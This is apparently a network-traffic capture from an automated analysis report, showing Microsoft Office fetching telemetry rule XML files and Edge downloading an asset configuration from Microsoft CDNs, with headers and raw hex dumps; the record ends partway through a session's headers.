                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 478
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 6856914c-401e-0029-0667-279b43000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210229Z-16849878b78bjkl8dpep89pbgg000000049000000000bnrd
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                57192.168.2.54983013.107.246.574436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC711OUTGET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Edge-Asset-Group: EntityExtractionDomainsConfig
                                                                                                                                                                                                                                                                                                                                Sec-Mesh-Client-Edge-Version: 117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Sec-Mesh-Client-Edge-Channel: stable
                                                                                                                                                                                                                                                                                                                                Sec-Mesh-Client-OS: Windows
                                                                                                                                                                                                                                                                                                                                Sec-Mesh-Client-OS-Version: 10.0.19045
                                                                                                                                                                                                                                                                                                                                Sec-Mesh-Client-Arch: x86_64
                                                                                                                                                                                                                                                                                                                                Sec-Mesh-Client-WebView: 0
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                Content-Length: 70207
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 24 Oct 2024 19:29:56 GMT
                                                                                                                                                                                                                                                                                                                                ETag: 0x8DCF4623DD70062
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: de0a2248-e01e-000b-427c-297073000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210229Z-17c5cb586f67hfgj2durhqcxk800000004hg000000000c7a
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC15821INData Raw: 1f 8b 08 08 34 a0 1a 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC16384INData Raw: 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 c1 d0 1d 5d d0 58 b3 51 22 09 e8 37 c0
                                                                                                                                                                                                                                                                                                                                Data Ascii: ,0Rte*|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;|a``|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:]XQ"7
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC16384INData Raw: d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b 70 5a 19 73 3e 85 d2 c6 f8 80 22 71 cd
                                                                                                                                                                                                                                                                                                                                Data Ascii: M kt|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX*$Nkct&iZ%b8Zoj@ u2OgA1DG3*5d*lg|9GV>OVzVMPA76.|crkXpZs>"q
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC16384INData Raw: 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc 9c d4 76 22 35 66 3f 5d d9 fb 8e 7d 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;v"5f?]}e
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC5234INData Raw: 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e 26 d2 d8 ca 80 2c 56 f9 34 27 86 21 28
                                                                                                                                                                                                                                                                                                                                Data Ascii: NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.&,V4'!(


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                58192.168.2.54983213.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 0ce3105a-501e-0029-7cd2-26d0b8000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210229Z-16849878b786fl7gm2qg4r5y7000000005tg00000000n907
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                59192.168.2.54983113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 404
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: a783173c-501e-008c-2349-27cd39000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210229Z-16849878b78qfbkc5yywmsbg0c000000056g00000000k0yp
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                60192.168.2.54983313.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 400
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 16672fc1-b01e-0001-32e8-2846e2000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210229Z-r197bdfb6b4bq7nf8dgr5rzeq400000000rg00000000qpsp
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                61192.168.2.54983513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 425
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 2b9d96d3-301e-0020-4e31-276299000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210230Z-16849878b78j5kdg3dndgqw0vg000000075g00000000uxwq
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                62192.168.2.54983613.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 475
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: b14e1d55-401e-0078-709c-274d34000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210230Z-17c5cb586f626sn8grcgm1gf80000000041000000000dktb
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
